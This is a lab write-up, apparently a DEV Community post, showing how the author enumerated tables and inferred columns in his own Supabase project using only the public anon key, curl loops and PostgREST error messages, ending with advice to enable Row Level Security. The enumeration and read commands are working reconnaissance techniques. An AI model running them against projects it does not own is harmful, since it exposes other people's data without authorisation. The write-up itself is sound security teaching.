By RUGERO Tesla (@404Saint)
The methodology matters more than the target
Most recon write-ups focus on the finding. This one focuses on the process.
The target here is a Supabase project I own. Controlled lab, no real user data. I gave myself only what an attacker would realistically have: the project URL and the anon key sitting in the frontend bundle. No dashboard access. No schema knowledge. No tools beyond curl and a small Python script.
The goal wasn't to find a vulnerability. It was to document what passive enumeration and error-based inference actually look like when you execute them methodically, step by step. The same reasoning drives this walkthrough as drives my ICS/OT reconnaissance work: observe first, infer from behavior, reconstruct what you can't see directly, never touch what you don't have to.
The target is different. The methodology is the same.
Step 0: What you start with
Every Supabase project exposes two things in the frontend by default: the project URL and the anon key. The anon key is a JWT. Before making a single network request, decoding it already tells you something:
{
"iss": "supabase",
"ref": "<project-ref>",
"role": "anon",
"iat": 1771624280,
"exp": 2087200280
}
Two observations worth making before you do anything else. The role is anon, which means this key authenticates as the anonymous PostgreSQL role and inherits whatever permissions the developer explicitly granted it. And the expiry is ten years out. If this key appears in a public repository or gets scraped from a frontend bundle, an attacker has a decade of access with no forced rotation.
Passive intelligence gathering before active enumeration. Know what you're working with.
Step 1: Try the obvious path first
The first probe is always the most direct one. PostgREST exposes an OpenAPI endpoint that would hand you the entire schema immediately if it responds:
curl "https://<project>.supabase.co/rest/v1/" \
-H "apikey: <anon_key>"
Response: {"message":"Invalid API key","hint":"Only the service_role API key can be used for this endpoint."}
Locked. The obvious path is closed.
This is where a lot of recon stops. It shouldn't. A failed probe isn't a dead end, it's information. You now know that schema discovery via OpenAPI requires elevated credentials, which means the developer at least configured that part correctly. It raises the bar from immediate to wordlist-dependent. That's a meaningful distinction, not a wall.
Step 2: Wordlist enumeration and what response codes tell you
With no schema available directly, you fall back to inferring structure through behavior. Common table names, systematic probing, reading the response codes.
for table in users profiles accounts orders assignments messages disputes notifications user_roles; do
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
"https://<project>.supabase.co/rest/v1/$table?select=*" \
-H "apikey: <anon_key>" \
-H "Authorization: Bearer <anon_key>")
echo "$table -> $STATUS"
done
The response codes are the signal:
-
200means the table exists, it's accessible, and nothing is blocking you -
403means the table exists but something is blocking you -
404means the table doesn't exist
Results from my project:
profiles -> 200
user_roles -> 200
assignments -> 200
messages -> 200
disputes -> 200
notifications -> 200
Six tables. All accessible. This isn't because I disabled access controls. It's because I never enabled them. That distinction matters and I'll come back to it.
The pattern here is worth internalizing. You're not looking for a vulnerability in the traditional sense. You're observing how the system responds to different inputs and reading what those responses imply about underlying structure. This is the same logic that drives behavioral fingerprinting in MEA: real devices and simulated ones respond differently under observation, and those differences tell you things you couldn't get by asking directly.
Step 3: Schema reconstruction through error-based inference
The OpenAPI spec is locked. But PostgREST's error messages are not, and that asymmetry is exploitable.
POSTing a request that references a nonexistent column returns PGRST204. POSTing with a real column returns something different: a constraint error, a type mismatch, a permission failure. The distinction leaks column existence without requiring any elevated access.
for col in id user_id email nickname university department level banned created_at; do
RESP=$(curl -s -X POST ".../rest/v1/profiles" \
-H "apikey: <key>" \
-H "Content-Type: application/json" \
-d "{\"$col\": \"probe\"}")
echo "$col -> $RESP"
done
Confirmed columns in profiles: id, user_id, nickname, university, department, level, created_at, updated_at.
Not found: email, banned.
Full schema reconstruction. No OpenAPI access. No elevated credentials. Just systematic probing and reading what the error responses imply.
This is error-based inference, and it appears across disciplines. In network recon, you read ICMP responses to infer firewall rules. In ICS environments, you observe register behavior to distinguish real devices from simulators. The underlying pattern is always the same: systems communicate their internal state through their responses, even when they're trying not to.
Step 4: Confirming access with a direct read
With table names and column structure mapped, the final step is confirming what's actually readable:
curl ".../rest/v1/assignments?select=*" \
-H "apikey: <key>" \
-H "Authorization: Bearer <key>"
Response:
[{
"id": "0155e342-...",
"student_id": "74aae5f9-...",
"title": "design",
"subject": "chem",
"deadline": "2026-04-09T06:30:00+00:00",
"budget": 2500.0,
"status": "open",
"sla_tier": "priority",
"payment_status": "none",
"escrow_status": "none"
}]
In a production environment with real users that's financial data, user identifiers, status information, all readable by anyone with a frontend key that's exposed by design.
Total time from zero knowledge to reading data: under ten minutes. One credential. A wordlist of ten common table names. Standard curl.
The methodology, extracted
The four-step pattern here generalizes:
Start passive. Decode what you already have before sending a single packet. The JWT alone told me the role, the project reference, and the key lifetime.
Try the direct path first. The OpenAPI endpoint would have given everything immediately. It failed, but the failure was informative. Never skip the obvious probe: if it works you're done early, if it fails you know something.
Infer from behavior when direct access fails. Response codes, error messages, timing differences. Systems leak information about their internal state constantly. Read it systematically.
Reconstruct before you read. Map the structure first, then confirm access. Going straight to data reads without understanding the schema means you'll miss things and make noise you didn't need to make.
This is the same sequence whether the target is a web API, a network perimeter, or an industrial protocol implementation. The tools change. The thinking doesn't.
The Supabase-specific finding
For anyone building on Supabase: Row Level Security is not enabled by default. Every table you create is immediately readable by the anon role through the PostgREST API until you explicitly enable RLS and write policies.
ALTER TABLE profiles ENABLE ROW LEVEL SECURITY;
CREATE POLICY "users can view own profile"
ON profiles FOR SELECT
USING (auth.uid() = user_id);
Without this, your anon key lives in your frontend bundle, is always public, and acts as a read key for your entire database. Enable RLS before you write application logic, not after.
Conducted against a project I own. No real user data involved. The record in assignments was seeded during development.
All my projects: github.com/404saint
Built by RUGERO Tesla · GitHub: @404Saint
Offensive security researcher focused on ICS/OT, infrastructure security, and attack surface analysis.
This article was originally published by DEV Community and written by 404Saint.
Read original article on DEV Community